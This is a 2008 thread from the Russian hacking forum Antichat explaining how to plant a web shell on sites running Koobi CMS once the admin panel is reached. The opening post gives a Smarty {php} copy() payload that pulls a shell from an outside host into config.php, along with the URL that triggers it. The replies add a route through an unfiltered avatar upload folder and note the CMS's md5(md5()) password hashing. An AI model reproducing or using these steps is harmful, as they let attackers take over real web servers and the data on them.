ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу заливка шела через Koobi CMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

заливка шела через Koobi CMS
  #1  
Старый 17.02.2008, 02:10
Аватар для vp$
vp$
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040

Репутация: 177
Отправить сообщение для vp$ с помощью ICQ
По умолчанию заливка шела через Koobi CMS
получив доступ к админке движка Koobi CMS я задался вопросом как же все таки залить шел на сервер, поиск в гугле абсолютно ничего дал. я решил сам изучить админку и через пол часа я уже лазил по серваку, как говорится "все гениальное-просто"

заходим в админку
http://www.saitik.com/admin/admin.php

и на администраторской панели выбираем
Статические страницы>Создать документ
заполняем появившуюся форму
Категория -- необязательно
Название -- shell
Имя документа -- shell
текст документа
Код:
{php} copy('http://hakersite.net/shel.txt','/home/public_html/saitik.com/config.php'); {/php}
где shell - любое слово,
http://hakersite.net/shel.txt - путь до шела в текстовом файле
/home/public_html/saitik.com/config.php - путь для записи шела /* может быть и таким ./config.php , если прав хватит*/

теперь нужно заставить сервер выполнить эту команду
http://www.saitik.com/index.php?area=1&p=static&page=shell

ну вот и все в принципе, можем с чистой совестью зайти на шел
http://www.saitik.com/config.php

зЫ: удачи в хаке!
 
Ответить с цитированием

  #2  
Старый 04.04.2008, 08:23
Аватар для Dr.Frank
Dr.Frank
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427

Репутация: 187
Отправить сообщение для Dr.Frank с помощью ICQ
По умолчанию
хм... а если папка /static/ закрыта на запись?
Тогда поступаем так: в админке выбераем меню: Файлы->Добавить файл в архив сайта
там нажимаем кнопку "Медиа каталог" или "Каталог загрузок", на открывшейся странице выбираем папку "avatars", нажимаем "Загрузка файлов" - загружаем шелл типа shell.php.
При Удачном раскладе(если файл загрузки не фильтрует файлы php) шелл будет доступен по адресу: http://site/uploads/avatars/shell.php

ЗЫ: в случае заливки шелла способом, представленным vp$ лучше заменить
Код:
{php} copy('http://hakersite.net/shel.txt','/home/public_html/saitik.com/config.php'); {/php}
на
Код:
{php} copy('http://hakersite.net/shel.txt','/home/public_html/saitik.com/uploads/avatars/config.php'); {/php}
Т.к. корневая директория может быть закрыта на запись - а папка с аватарками обычно открыта
 
Ответить с цитированием

  #3  
Старый 14.06.2008, 08:43
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию
Dr.Frank, как-то ты запутано написал.. =\ я хз, туда попал, где ты говорил (язык не совcем RU or ENG) но одним словом открываем /admin/mediapool.php?typ=bild&target=images и грузим свое добро.

напомню, что хешируется пасс md5(md5()).
__________________
ПИУ-ПИУ...
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
CMS vs "изготовление на коленках" vadim_samoilov Чужие Статьи 8 19.08.2008 02:10
Заливка файла через форум и через другой скрипт. _Sanich PHP, PERL, MySQL, JavaScript 0 13.02.2008 05:21
video заливка шела через phpmyadmin heks Болталка 8 05.01.2008 20:37
Добавление скрытого пользователя в Koobi CMS 5.1.1 otmorozok428 Сценарии/CMF/СMS 8 11.12.2007 18:37
Получение шела через Cgi приложения k00p3r Чужие Статьи 0 08.06.2005 15:04



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ